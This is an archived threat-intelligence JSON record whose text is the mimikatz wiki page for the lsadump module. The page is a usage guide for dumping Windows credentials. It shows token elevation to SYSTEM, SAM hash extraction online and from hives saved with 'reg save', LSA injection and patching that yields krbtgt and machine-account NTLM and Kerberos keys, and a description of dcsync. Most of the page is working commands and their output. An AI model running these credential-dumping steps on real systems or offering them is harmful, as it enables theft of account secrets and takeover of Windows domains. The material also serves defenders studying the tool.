{
	"id": "7623df29-5aee-4cfc-b70f-af782d172e80",
	"created_at": "2026-04-06T00:14:15.2065Z",
	"updated_at": "2026-04-10T03:21:43.433243Z",
	"deleted_at": null,
	"sha1_hash": "bebedcc213faa1d3a21b7bcec3c34266bd024b8b",
	"title": "module ~ lsadump",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 73031,
	"plain_text": "module ~ lsadump\r\nBy gentilkiwi\r\nArchived: 2026-04-05 18:27:41 UTC\r\nCommands: sam, secrets, cache, lsa, trust, backupkeys, rpdata, dcsync, netsync\r\nsam\r\nThis command dumps the Security Account Manager (SAM) database. It contains the NTLM, and sometimes LM,\r\nhashes of user passwords. It can work in two modes: online (with SYSTEM user or token) or offline (with SYSTEM\r\n\u0026 SAM hives or backup)\r\nonline\r\nIf you're not SYSTEM or using an impersonated SYSTEM token, you'll get an access denied error:\r\nmimikatz # lsadump::sam\r\nDomain : VM-W7-ULT-X\r\nSysKey : 74c159e4408119a0ba39a7872e9d9a56\r\nERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)\r\nIn this case, you can use psexec to become SYSTEM (or other tools) or elevate with the token::elevate command to\r\nimpersonate a SYSTEM token:\r\nmimikatz # privilege::debug\r\nPrivilege '20' OK\r\nmimikatz # token::whoami\r\n * Process Token : 623884 vm-w7-ult-x\\Gentil Kiwi S-1-5-21-1982681256-1210654043-1600862990-1000 (14g,24p\r\n * Thread Token : no token\r\nmimikatz # token::elevate\r\nToken Id : 0\r\nUser name :\r\nSID name : AUTORITE NT\\Système\r\n228 24215 AUTORITE NT\\Système S-1-5-18 (04g,30p) Primary\r\n -\u003e Impersonated !\r\n * Process Token : 623884 vm-w7-ult-x\\Gentil Kiwi S-1-5-21-1982681256-1210654043-1600862990-1000 (14g,24p\r\n * Thread Token : 624196 AUTORITE NT\\Système S-1-5-18 (04g,30p) Impersonation (Delegatio\r\nmimikatz # lsadump::sam\r\nDomain : VM-W7-ULT-X\r\nSysKey : 74c159e4408119a0ba39a7872e9d9a56\r\nSAMKey : e44dd440fd77ebfe800edf60c11d4abd\r\nRID : 000001f4 (500)\r\nUser : Administrateur\r\nLM :\r\nNTLM : 31d6cfe0d16ae931b73c59d7e0c089c0\r\nRID : 000001f5 (501)\r\nUser : Invité\r\nLM :\r\nNTLM :\r\nRID : 000003e8 (1000)\r\nUser : Gentil Kiwi\r\nLM :\r\nNTLM : cc36cf7a8514893efccd332446158b1a\r\noffline\r\nYou can back up the SYSTEM \u0026 SAM 
hives with:\r\nreg save HKLM\\SYSTEM SystemBkup.hiv\r\nreg save HKLM\\SAM SamBkup.hiv\r\nOr use Volume Shadow Copy / BootCD to back up these files:\r\nC:\\Windows\\System32\\config\\SYSTEM\r\nC:\\Windows\\System32\\config\\SAM\r\nOf course, you can also use files directly from another Windows location.\r\nThen\r\nmimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv\r\nDomain : VM-W7-ULT-X\r\nSysKey : 74c159e4408119a0ba39a7872e9d9a56\r\nSAMKey : e44dd440fd77ebfe800edf60c11d4abd\r\nRID : 000001f4 (500)\r\nUser : Administrateur\r\nLM :\r\nNTLM : 31d6cfe0d16ae931b73c59d7e0c089c0\r\nRID : 000001f5 (501)\r\nUser : Invité\r\nLM :\r\nNTLM :\r\nRID : 000003e8 (1000)\r\nUser : Gentil Kiwi\r\nLM :\r\nNTLM : cc36cf7a8514893efccd332446158b1a\r\nsecrets\r\ncache\r\nlsa\r\nmimikatz # lsadump::lsa /id:500\r\nDomain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670\r\nRID : 000001f4 (500)\r\nUser : Administrateur\r\nERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003\r\nmimikatz # lsadump::lsa /inject /name:krbtgt\r\nDomain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670\r\nRID : 000001f6 (502)\r\nUser : krbtgt\r\n * Primary\r\n LM :\r\n NTLM : 310b643c5316c8c3c70a10cfb17e2e31\r\n * WDigest\r\n 01 54a52c7ef73ebe90194c083129d6ac81\r\n 02 9fa3bb508e7b3646efa65acbd22e2af9\r\n 03 e185f5c75b64f94e5716a1e42e37794d\r\n 04 54a52c7ef73ebe90194c083129d6ac81\r\n 05 9fa3bb508e7b3646efa65acbd22e2af9\r\n 06 5dd4ee69b653c5c9aad64a393b6a9700\r\n 07 54a52c7ef73ebe90194c083129d6ac81\r\n 08 7bedf3c0186f4af47c95724fbeed7a44\r\n 09 7bedf3c0186f4af47c95724fbeed7a44\r\n 10 80e30fbce1952fc7aa5778f51ffad4d8\r\n 11 1c05ad8928e14f380db8a831c1946fe3\r\n 12 7bedf3c0186f4af47c95724fbeed7a44\r\n 13 c33523d429bce0c392c89ac2d301ae6c\r\n 14 1c05ad8928e14f380db8a831c1946fe3\r\n 15 536c8128d7cf8667164ed762ad2fb9e6\r\n 16 
536c8128d7cf8667164ed762ad2fb9e6\r\n 17 a1c4b9e13d6679796398e4cacad0cb03\r\n 18 3f36213dfa4ea6f9e505a60c58c6393a\r\n 19 dfda9df26d75e40b1639cf9305937f51\r\n 20 b469efd6b8bff67312a09918526ef080\r\n 21 49a1ad8ee21e79f44a8033e189616981\r\n 22 49a1ad8ee21e79f44a8033e189616981\r\n 23 079b50c03444176568e0732db7e65b85\r\n 24 3885d7b1fa11fd86e892e2aaab4c0aec\r\n 25 3885d7b1fa11fd86e892e2aaab4c0aec\r\n 26 5bd64f5d0bcca6c10ccbf2fbb5043a74\r\n 27 9c546227d4c3bbbd4a5a6065dd7b7213\r\n 28 e776b6660b25384f87d55cc300657d13\r\n 29 26c87bd1a9c48e652f83431bf20227c2\r\n * Kerberos\r\n Default Salt : CHOCOLATE.LOCALkrbtgt\r\n Credentials\r\n des_cbc_md5 : 620eb39e450e6776\r\n * Kerberos-Newer-Keys\r\n Default Salt : CHOCOLATE.LOCALkrbtgt\r\n Default Iterations : 4096\r\n Credentials\r\n aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42\r\n aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb\r\n des_cbc_md5 (4096) : 620eb39e450e6776\r\nmimikatz # lsadump::lsa /patch\r\nDomain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670\r\nRID : 000001f4 (500)\r\nUser : Administrateur\r\nLM :\r\nNTLM : cc36cf7a8514893efccd332446158b1a\r\nRID : 000001f5 (501)\r\nUser : Invité\r\nLM :\r\nNTLM :\r\nRID : 000001f6 (502)\r\nUser : krbtgt\r\nLM :\r\nNTLM : 310b643c5316c8c3c70a10cfb17e2e31\r\nRID : 00000452 (1106)\r\nUser : equipement\r\nLM :\r\nNTLM : 57a087d98bfac9df10df27a564b77ad6\r\nRID : 00000453 (1107)\r\nUser : utilisateur\r\nLM :\r\nNTLM : 8e3a18d453ec2450c321003772d678d5\r\nRID : 000003e9 (1001)\r\nUser : SRVCHARLY$\r\nLM :\r\nNTLM : cfe67c8e5e5bab99b911302728152ab3\r\nRID : 00000450 (1104)\r\nUser : WIN81$\r\nLM :\r\nNTLM : ad0344245f24e4927d9480559c7f8842\r\nRID : 00000451 (1105)\r\nUser : WINXP$\r\nLM :\r\nNTLM : d2624e317aa4d245b7dad2942444d7f7\r\ndcsync\r\nThis command uses the DRSR protocol to ask a domain controller to synchronize a specified entry. 
It's the same\r\nprotocol that domain controllers use between themselves.\r\nIt was co-written with Vincent LE TOUX ( vincent.letoux [at] gmail.com / http://www.mysmartlogon.com )\r\nArguments:\r\n/domain - optional - the FQDN of the domain you want to synchronize (default: your current domain)\r\n/dc - optional - the FQDN of the domain controller you want to synchronize (default: autodetected from the\r\ndomain name)\r\nSource: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump"
	],
	"report_names": [
		"module-~-lsadump"
	],
	"threat_actors": [],
	"ts_created_at": 1775434455,
	"ts_updated_at": 1775791303,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bebedcc213faa1d3a21b7bcec3c34266bd024b8b.pdf",
		"text": "https://archive.orkl.eu/bebedcc213faa1d3a21b7bcec3c34266bd024b8b.txt",
		"img": "https://archive.orkl.eu/bebedcc213faa1d3a21b7bcec3c34266bd024b8b.jpg"
	}
}